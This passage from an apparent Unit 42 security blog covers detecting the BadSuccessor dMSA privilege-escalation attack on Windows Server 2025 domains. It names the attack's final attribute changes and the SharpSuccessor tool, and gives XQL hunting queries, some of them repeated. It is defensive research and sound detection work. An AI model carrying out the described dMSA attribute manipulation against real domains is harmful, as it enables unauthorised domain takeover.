Figure 17 shows the last step that consists of changing the msDS-DelegatedMSAState attribute to 2, and changing the msDS-ManagedAccountPrecededByLink attribute to the superseded account.

Event Properties window showing details of a security audit for Event 4662. The object accessed is managed by the account "ENVO\Administrator" and the operation involved writing properties. A specific GUID identifier is highlighted in red. — Figure 17. Event ID 4662 that audits the changes made to the msDS-DelegatedMSAState and msDS-ManagedAccountPrecededByLink attributes.

Enabling Auditing

To identify the attack footprint and conduct detection activities, auditing must be enabled. Figure 18 shows an example of a relevant auditing interface.

Screenshot of a computer interface for managing user permissions with various options for types of permissions like 'Read all' and 'Modify permissions', and an arrow pointing to a dropdown list labeled 'Assign to' with the selected option. — Figure 18. Example of auditing enablement on Windows Server 2025.

Conclusion

We examined the BadSuccessor technique and explored how, under certain conditions, adversaries can exploit the newly introduced dMSAs in a Windows Server 2025 DC to compromise the domain. We also analyzed the operational footprints left by this activity and proposed a novel detection strategy to identify such attacks.

Given how effective this attack can be, we strongly recommend closely monitoring Microsoft’s updates to understand available mitigation strategies and to properly configure all permissions — particularly those related to the BadSuccessor attack.

Palo Alto Networks Protections

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

One such product is Palo Alto Networks XSIAM, which can detect BadSuccessor activity if Windows security auditing is enabled on the dMSA. Our security auditing guide for Microsoft Windows systems provides information on how to configure the required auditing on Windows Server 2025.

Figure 19 shows an example of a “Possible Privilege Escalation using delegated MSA account attempt” in XSIAM.

Screenshot of Cortex XDR cybersecurity dashboard displaying details about a potential Privilege Escalation incident using Delegated MSA account in a Windows environment. Information includes alerts, user data, timestamps, and MITRE ATT&CK tactics related to credential manipulation. — Figure 19. Example of a Cortex XDR alert for “Possible privilege escalation using delegated MSA account attempt.”

Cortex XDR and XSIAM detect user and credential-based threats by analyzing user activity from multiple data sources including endpoints, network firewalls, AD, identity and access management solutions, and cloud workloads. Cortex builds behavioral profiles of user activity over time with machine learning. By comparing new activity to past activity, peer activity and the expected behavior of the entity, Cortex detects anomalous activity indicative of credential-based attacks.

Unit 42 Managed Detection and Response Service delivers continuous 24/7 threat detection, investigation and response/remediation to customers of all sizes globally.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
UK: +44.20.3743.3660
Europe and Middle East: +31.20.299.3130
Asia: +65.6983.8730
Japan: +81.50.1790.0200
Australia: +61.2.4062.7950
India: 00080005045107

Additional Resources

Appendix

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team has created queries that can help defenders identify potential signs of dMSA misuse and use of SharpSuccessor.

Assuming that all auditing has been enabled and event logs are being properly ingested, the query provided below can be used to identify potential signs of SharpSuccessor execution.

As SharpSuccessor creates a computer account, hunters can correlate SubjectLogonIDs to identify relevant events. Event ID 4741 indicates that a computer account was created, and Event ID 4662 shows that an operation was performed — in this case, dMSA creation. Then, hunters can enrich the details of the user account that performed the action, by correlating Event ID 4624 to pull in information such as:

Workstation name
IP address
Logon type

We recommend running this query on smaller time frames, given the multiple joins and alter commands leveraged.

dataset = xdr_data

// Identify any object access/modification events for the msDS-DelegatedManagerServiceAccount object type

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields, action_evtlog_message, event_timestamp

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4662

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter ObjectServer = action_evtlog_data_fields -> ObjectServer

| alter ObjectType = action_evtlog_data_fields -> ObjectType

| alter ObjectName = action_evtlog_data_fields -> ObjectName

| alter AdditionalInfo2 = action_evtlog_data_fields -> AdditionalInfo2

| alter OperationType = action_evtlog_data_fields -> OperationType

| alter AccessList = action_evtlog_data_fields -> AccessList

| alter AccessMask = action_evtlog_data_fields -> AccessMask

// msDS-DelegatedManagedServiceAccount Object Type

| filter ObjectType = "%{0feb936f-47b3-49f2-9386-1dedc2c23765}" and AccessMask = "0x20"

// Join on Event ID 4741 by SubjectLogonID to identify the machine account name that was created.

| join type = inner conflict_strategy = left (

dataset = xdr_data

| fields _time, agent_hostname, action_evtlog_event_id, action_evtlog_description, event_type, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4741

// Field extraction

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter TargetUserName = action_evtlog_data_fields -> TargetUserName

| alter TargetDomainName = action_evtlog_data_fields -> TargetDomainName

| alter SamAccountName = action_evtlog_data_fields -> SamAccountName

| alter DnsHostName = action_evtlog_data_fields -> DnsHostName

| fields _time as comp_time, agent_hostname as comp_hostname, SubjectDomainName as comp_SubjectDomainName, SubjectUserName as comp_SubjectUserName, SubjectLogonId as comp_SubjectLogonId, SubjectUserSid as comp_SubjectUserSid, TargetUserName, SamAccountName, DnsHostName

) as cmpcreate cmpcreate.comp_hostname = agent_hostname and cmpcreate.comp_SubjectUserName = SubjectUserName and cmpcreate.comp_SubjectLogonId = SubjectLogonId and cmpcreate.comp_SubjectUserSid = SubjectUserSid

// Join on Event ID 4624 to enrich authentication activity that performed the machine account creation, and dMSA creation

| join type = left (

dataset = xdr_data

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4624

// Extract relevant fields

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter TargetDomainName = action_evtlog_data_fields -> TargetDomainName

| alter TargetUserName = action_evtlog_data_fields -> TargetUserName

| alter TargetUserSid = action_evtlog_data_fields -> TargetUserSid

| alter TargetLogonId = action_evtlog_data_fields -> TargetLogonId

| alter IpAddress = action_evtlog_data_fields -> IpAddress

| alter IpPort = action_evtlog_data_fields -> IpPort

| alter LogonType = action_evtlog_data_fields -> LogonType

| alter WorkstationName = action_evtlog_data_fields -> WorkstationName

| filter TargetUserName !~= "(?:(?:(?:DWM|UMFD)-\d)|(?:NETWORK SERVICE)|(?:LOCAL SERVICE)|(?:ANONYMOUS LOGON)|(?:SYSTEM)|\w+\$$)"

| fields agent_hostname as auth_hostname, TargetUserName as auth_username, TargetLogonId as auth_logonID, TargetUserSid as auth_usersid, IpAddress, WorkstationName, LogonType

) as auth auth.auth_hostname = agent_hostname and auth.auth_username = SubjectUserName and auth.auth_logonID = SubjectLogonId and auth.auth_usersid = SubjectUserSid

| fields _time, agent_hostname, SubjectDomainName, SubjectUserSid, SubjectUserName, SubjectLogonId, OperationType, ObjectType, ObjectName, comp_time, TargetUserName, SamAccountName, DnsHostName, LogonType, IpAddress, WorkstationName

100

101

102

103

104

105

106

107

108

109

dataset = xdr_data

// Identify any object access/modification events for the msDS-DelegatedManagerServiceAccount object type

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields, action_evtlog_message, event_timestamp

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4662

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter ObjectServer = action_evtlog_data_fields -> ObjectServer

| alter ObjectType = action_evtlog_data_fields -> ObjectType

| alter ObjectName = action_evtlog_data_fields -> ObjectName

| alter AdditionalInfo2 = action_evtlog_data_fields -> AdditionalInfo2

| alter OperationType = action_evtlog_data_fields -> OperationType

| alter AccessList = action_evtlog_data_fields -> AccessList

| alter AccessMask = action_evtlog_data_fields -> AccessMask

// msDS-DelegatedManagedServiceAccount Object Type

| filter ObjectType = "%{0feb936f-47b3-49f2-9386-1dedc2c23765}" and AccessMask = "0x20"

// Join on Event ID 4741 by SubjectLogonID to identify the machine account name that was created.

| join type = inner conflict_strategy = left (

dataset = xdr_data

| fields _time, agent_hostname, action_evtlog_event_id, action_evtlog_description, event_type, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4741

// Field extraction

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter TargetUserName = action_evtlog_data_fields -> TargetUserName

| alter TargetDomainName = action_evtlog_data_fields -> TargetDomainName

| alter SamAccountName = action_evtlog_data_fields -> SamAccountName

| alter DnsHostName = action_evtlog_data_fields -> DnsHostName

| fields _time as comp_time, agent_hostname as comp_hostname, SubjectDomainName as comp_SubjectDomainName, SubjectUserName as comp_SubjectUserName, SubjectLogonId as comp_SubjectLogonId, SubjectUserSid as comp_SubjectUserSid, TargetUserName, SamAccountName, DnsHostName

) as cmpcreate cmpcreate.comp_hostname = agent_hostname and cmpcreate.comp_SubjectUserName = SubjectUserName and cmpcreate.comp_SubjectLogonId = SubjectLogonId and cmpcreate.comp_SubjectUserSid = SubjectUserSid

// Join on Event ID 4624 to enrich authentication activity that performed the machine account creation, and dMSA creation

| join type = left (

dataset = xdr_data

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4624

// Extract relevant fields

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter TargetDomainName = action_evtlog_data_fields -> TargetDomainName

| alter TargetUserName = action_evtlog_data_fields -> TargetUserName

| alter TargetUserSid = action_evtlog_data_fields -> TargetUserSid

| alter TargetLogonId = action_evtlog_data_fields -> TargetLogonId

| alter IpAddress = action_evtlog_data_fields -> IpAddress

| alter IpPort = action_evtlog_data_fields -> IpPort

| alter LogonType = action_evtlog_data_fields -> LogonType

| alter WorkstationName = action_evtlog_data_fields -> WorkstationName

| fields agent_hostname as auth_hostname, TargetUserName as auth_username, TargetLogonId as auth_logonID, TargetUserSid as auth_usersid, IpAddress, WorkstationName, LogonType

) as auth auth.auth_hostname = agent_hostname and auth.auth_username = SubjectUserName and auth.auth_logonID = SubjectLogonId and auth.auth_usersid = SubjectUserSid

| fields _time, agent_hostname, SubjectDomainName, SubjectUserSid, SubjectUserName, SubjectLogonId, OperationType, ObjectType, ObjectName, comp_time, TargetUserName, SamAccountName, DnsHostName, LogonType, IpAddress, WorkstationName

For customers who have enabled auditing and are ingesting Event ID 5136, the following query can be used to identify creation of dMSAs.

// Description: Identify creation of a dMSA

dataset = xdr_data

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 5136

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter AppCorrelationID = action_evtlog_data_fields -> AppCorrelationID

| alter AttributeLDAPDisplayName = action_evtlog_data_fields -> AttributeLDAPDisplayName

| alter AttributeSyntaxOID = action_evtlog_data_fields -> AttributeSyntaxOID

| alter AttributeValue = action_evtlog_data_fields -> AttributeValue

| alter DSName = action_evtlog_data_fields -> DSName

| alter DSType = action_evtlog_data_fields -> DSType

| alter ObjectClass = action_evtlog_data_fields -> ObjectClass

| alter ObjectDN = action_evtlog_data_fields -> ObjectDN

| alter ObjectGUID = action_evtlog_data_fields -> ObjectGUID

| alter OpCorrelationID = action_evtlog_data_fields -> OpCorrelationID

| alter OperationType = action_evtlog_data_fields -> OperationType

// ObjectGUID is the MsDS-DelegatedManagedServiceAccount and the attribute value of 2 where the operation is a Value Add

| filter ObjectClass = "msDS-DelegatedManagedServiceAccount" and AttributeLDAPDisplayName = "msDS-DelegatedMSAState" and AttributeValue = "2" and OperationType = "%%14674"

// Query to pull in the authentication activity that performed the object access/modification

| join type = left (

dataset = xdr_data

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 4624

// Extract relevant fields

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter TargetDomainName = action_evtlog_data_fields -> TargetDomainName

| alter TargetUserName = action_evtlog_data_fields -> TargetUserName

| alter TargetUserSid = action_evtlog_data_fields -> TargetUserSid

| alter TargetLogonId = action_evtlog_data_fields -> TargetLogonId

| alter IpAddress = action_evtlog_data_fields -> IpAddress

| alter IpPort = action_evtlog_data_fields -> IpPort

| alter LogonType = action_evtlog_data_fields -> LogonType

| alter WorkstationName = action_evtlog_data_fields -> WorkstationName

| filter TargetUserName !~= "(?:(?:(?:DWM|UMFD)-\d)|(?:NETWORK SERVICE)|(?:LOCAL SERVICE)|(?:ANONYMOUS LOGON)|(?:SYSTEM)|\w+\$$)"

| fields agent_hostname as auth_hostname, TargetUserName as auth_username, TargetLogonId as auth_logonID, TargetUserSid as auth_usersid, IpAddress, WorkstationName, LogonType

) as auth auth.auth_hostname = agent_hostname and auth.auth_username = SubjectUserName and auth.auth_logonID = SubjectLogonId and auth.auth_usersid = SubjectUserSid

| fields _time, agent_hostname, SubjectDomainName, SubjectUserName, SubjectUserSid, SubjectLogonId, ObjectDN, ObjectGUID, AttributeLDAPDisplayName, AttributeValue, LogonType, IpAddress, WorkstationName

// Description: Identify creation of a dMSA

dataset = xdr_data

| fields _time, agent_hostname, event_type, action_evtlog_event_id, action_evtlog_data_fields

| filter event_type = ENUM.EVENT_LOG and action_evtlog_event_id = 5136

| alter SubjectDomainName = action_evtlog_data_fields -> SubjectDomainName

| alter SubjectLogonId = action_evtlog_data_fields -> SubjectLogonId

| alter SubjectUserName = action_evtlog_data_fields -> SubjectUserName

| alter SubjectUserSid = action_evtlog_data_fields -> SubjectUserSid

| alter AppCorrelationID = action_evtlog_data_fields -> AppCorrelationID

| alter AttributeLDAPDisplayName = action_evtlog_data_fields -> AttributeLDAPDisplayName

| alter AttributeSyntaxOID = action_evtlog_data_fields -> AttributeSyntaxOID

| alter AttributeValue = action_evtlog_data_fields -> AttributeValue

| alter DSName = action_evtlog_data_fields -> DSName

| alter DSType = action_evtlog_data_fields -> DSType

| alter ObjectClass = action_evtlog_data_fields -> ObjectClass

| alter ObjectDN = action_evtlog_data_fields -> ObjectDN

| alter ObjectGUID = action_evtlog_data_fields -> ObjectGUID

| alter OpCorrelationID = action_evtlog_data_fields -> OpCorrelationID

| alter OperationType = action_evtlog_data_fields -> OperationType

// ObjectGUID is the MsDS-DelegatedManagedServiceAccount and the attribute value of 2 where the operation is a Value Add

| filter ObjectClass = "msDS-DelegatedManagedServiceAccount" and AttributeLDAPDisplayName = "msDS-DelegatedMSAState" and AttributeValue = "2" and OperationType = "%%14674"

// Query to pull in the authentication activity that performed the object access/modification